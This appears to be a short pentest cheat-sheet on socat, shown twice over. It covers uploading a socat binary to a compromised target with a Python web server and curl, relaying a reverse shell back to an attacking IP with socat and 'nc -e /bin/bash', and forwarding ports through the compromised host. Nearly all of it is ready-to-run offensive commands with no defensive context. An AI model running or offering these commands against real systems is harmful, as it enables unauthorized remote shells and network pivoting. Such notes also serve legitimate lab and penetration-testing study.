socat

socat can be used for stable linux shells and port forwarding
before using socat, it will usually be necessary to download a binary and then upload it to the target
- sudo python3 -m http.server 80
- then on the target: curl attacking_ip/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME
reverse shell relay
- start a netcat listener on the attacking host
- sudo nc -lvnp 443
- then on the target run
- ./socat tcp-l:8000 tcp:Attacking_IP:443 &
- then we can create a reverse shell on the newly opened port using netcat
- ./nc 127.0.0.1 8000 -e /bin/bash
port forwarding
- easy
  - the easiest way is to open up a listening port on the compromised server then redirect anything that comes in to the target serve
  - ./socat tcp-l:33060,fork,reuseaddr tcp:<ip>:<port> &

Last updated 4 months ago

socat can be used for stable linux shells and port forwarding
before using socat, it will usually be necessary to download a binary and then upload it to the target
- sudo python3 -m http.server 80
- then on the target: curl attacking_ip/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME
reverse shell relay
- start a netcat listener on the attacking host
- sudo nc -lvnp 443
- then on the target run
- ./socat tcp-l:8000 tcp:Attacking_IP:443 &
- then we can create a reverse shell on the newly opened port using netcat
- ./nc 127.0.0.1 8000 -e /bin/bash
port forwarding
- easy
  - the easiest way is to open up a listening port on the compromised server then redirect anything that comes in to the target serve
  - ./socat tcp-l:33060,fork,reuseaddr tcp:<ip>:<port> &

Last updated 4 months ago